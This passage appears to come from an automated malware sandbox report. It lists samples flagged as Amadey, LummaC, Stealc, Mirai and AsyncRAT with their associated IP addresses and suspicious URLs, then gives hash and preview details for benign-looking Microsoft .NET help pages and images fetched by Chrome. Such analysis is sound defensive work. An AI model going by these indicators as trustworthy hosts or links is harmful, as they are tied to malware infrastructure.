                                                                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 20.80.33.63
                                                                                                                                                                                            WHOLESALECONNECTIONSNLHnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                            file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                            • 185.215.113.43
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                            file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                            • 185.215.113.43
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            28a2c9bd18a11de089ef85a160da29e4Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            https://ch-review.incendiaryblue.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            https://docs.google.com/presentation/d/e/2PACX-1vTAoe8qPXC0cJJn6_2lLEv9r90P4SmL-xhPNwUfY42Cu5vLgixQnjGGDWLIXEo5gnj8n1vLZKyi99gr/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=SepGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            https://www.plushtoysmfg.com/plush-keychain-factory/Get hashmaliciousAnonymous ProxyBrowse
                                                                                                                                                                                            • 172.202.163.200
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            • 2.16.229.162
                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            aHPgKqtKWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            LxvS6uMf0g.exeGet hashmaliciousAcrid StealerBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            No context
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):47062
                                                                                                                                                                                            Entropy (8bit):5.016115705165622
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                            MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                            SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                            SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                            SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):464328
                                                                                                                                                                                            Entropy (8bit):5.074669864961383
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                            MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                            SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                            SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                            SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
